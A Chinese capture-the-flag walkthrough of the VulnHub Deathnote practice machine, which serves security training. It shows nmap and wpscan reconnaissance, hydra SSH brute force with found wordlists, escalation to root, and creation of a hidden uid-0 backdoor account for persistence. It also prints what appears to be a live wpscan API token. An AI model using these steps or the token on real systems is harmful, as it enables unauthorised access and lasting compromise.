靶机下载地址:https://www.vulnhub.com/entry/deathnote-1,739/
教程链接地址: https://blog.csdn.net/lionwerson/article/details/121594545

# 确认攻击目标

攻击机 KALI: 192.168.31.135
靶机 DEATHNOTE:桥接于 192.168.31.1 的网卡,ip 未知

  1. 通过 netdiscover 扫描当前网卡里边有哪些机器
    sudo netdiscover -i eth0 -r 192.168.31.0/24

  2. 将所有已知的 ip 暂时存档,对这类 ip 地址不做端口扫描

1
2
3
4
5
# shell
cat > myip.txt << EOF
192.168.31.1 192.168.31.25 192.168.31.58 192.168.31.86 192.168.31.33
192.168.31.120 192.168.31.135 192.168.31.145 192.168.31.162 192.168.31.44
EOF
  1. 获取靶机 ip 地址
1
2
3
4
5
# 去除一些已知ip的机器,对剩余IP进行端口扫描,判断目标IP
sudo nmap -PA 192.168.31.107 --excludefile myip.txt

# 或者使用 arp 扫描
sudo arp -l
Image

-> 目标机器的 ip 地址: 192.168.31.212

  1. 确认靶机 ip 开放的端口信息

sudo nmap -A -p- 192.168.31.212 -oN /tmp/deathnote.txt

Image

-> 靶机开放端口 22, 80

# wpscan 扫描 wordpress

打开 http://192.168.31.212/ 进行信息收集
网页发生跳转,可直接修改本地 hosts 文件,改变 dns 解析
/etc/hosts 中添加 192.168.31.212 deathnote.vuln

网站是一个 wordpress 网站,可直接利用 wpscan 扫描

1
2
# 通过wpscan对网站的用户名进行枚举
wpscan --url http://192.168.31.212/wordpress/ --enumerate u --api-token eG5iT4ooiuP7eVJVedsHhlgx8xeZHmAJjBr13asnjEc
Image

-> 得到网站的用户名有 kira

1
2
# 根据用户名kira继续扫描密码看是否能扫到
wpscan --url http://192.168.31.212/wordpress/ -U kira -P /usr/share/wordlists/rockyou.txt --api-token eG5iT4ooiuP7eVJVedsHhlgx8xeZHmAJjBr13asnjEc

-> 没有扫到用户 kira 的密码

翻阅网站可点击的地方,找到一处提示

根据提示,访问 http://192.168.31.212/notes.txt

Image

没有找到这个提示文件

顺便访问一下爬虫协议的文件:http://192.168.31.212/robots.txt

Image
1
2
3
# 根据提示下载 jpg
wget http://192.168.31.212/important.jpg
cat important.jpg
Image

新的提示,网站密码应该在网站的页面上

-> 发现疑似密码的字符串 iamjustic3

# wordpress 后台突破

可以使用 msf 直接 getshell,或者在后台寻找突破反弹 shell
wordpress 的后台 wp-login:http://192.168.31.212/wordpress/wp-login.php
用户名 kira 密码 iamjustic3

翻阅后台文件,找到了 notes.txt

点击进入到 notes.txt 可以找到这个文件的 url 地址

下载到本地,查看此文件查询更多详细的信息

1
2
wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
cat notes.txt

# hydra 爆破 SSH

发现是一个密码文件,尝试用 hydra 进行爆破 ssh 登陆

1
hydra -l kira - P notes.txt ssh://192.168.31. 212 - f -t 4 -I -vV -o hydra.ssh

-> 爆破失败,无法用用户 kira 登陆到此服务器

前面得到一个线索 user.txt 中可能藏着一些敏感的用户
此时我们已经拿到了后台的权限,可以访问
http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
获取到目标机器密码的列表,我们可以尝试访问
http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt

找到了敏感的 user.txt 文件,可以用做 hydra 的爆破用户名的字典,可以将疑似网站用户的昵称提前,如在网站上看到的 kira,l
如果用户名刚好是这些,可以很快的提高爆破速度

1
2
wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt
hydra -L user.txt -P notes.txt ssh://192.168.31. 212 -f -t 4 -I -vV -o hydra.ssh

-> 用户名 l 密码 death4me

# CyberChef 解密

1
2
3
4
5
# 登陆到目标服务器 
ssh l@192.168.31.212

# 收集服务器的相关信息
cat /etc/issue && uname -a && sudo -l

-> 用户 l 在目标机器上没有 sudo 权限

翻阅目录,找到了下面这个加密文件

这是 brainfuck 加密,在线解密 https://ctf.bugku.com/tool/brainfuck

得到提示,我们需要进入到 kira 用户里边,再次在目标服务器里边进行搜索,找到一个敏感目录 /opt/L

Image

在线解密 https://gchq.github.io/CyberChef/

-> 通过 magic 方法可破解得到密码 kiraisevil

su kira 切换到 kira 账户,sudo -l 查看相关权限设置
发现该账户可以执行所有的 root 命令,直接 sudo su 切换到 root 账户

Image

# 创建特权用户维权

权限维持参考地址:https://bypass007.github.io/Emergency-Response-Notes/privilege/

1
2
3
4
5
6
7
8
9
# 创建一个用户名X_T,密码 123456 的普通用户
useradd -p `openssl passwd - 1 - salt 'salt' 123456` X_T

# 创建一个用户名kali,密码kali的root用户
useradd -p `openssl passwd - 1 - salt 'salt' kali` kali -o -u 0 -g root -G root -s /bin/bash -d /home/test

# 尝试连接
ssh X_T@192.168.31.212
su kali

-> 每次都可以通过先登陆到 X_T 用户,再通过 su kali 切换到 root 账户

# 可疑用户排查技巧

1
2
3
4
5
6
7
8
# 查询特权用户特权用户(uid 为 0 )
awk -F: '$3==0{print $1}' /etc/passwd

# 查询可以远程登录的帐号信息
awk '/\$1|\$6/{print $1}' /etc/shadow

# 除root帐号外,其他帐号是否存在sudo权限。如没有必要,普通帐号应删除sudo权限
more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"

-> 靶机攻击结束

更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

.N1h1l157 微信支付

微信支付

.N1h1l157 支付宝

支付宝

.N1h1l157 贝宝

贝宝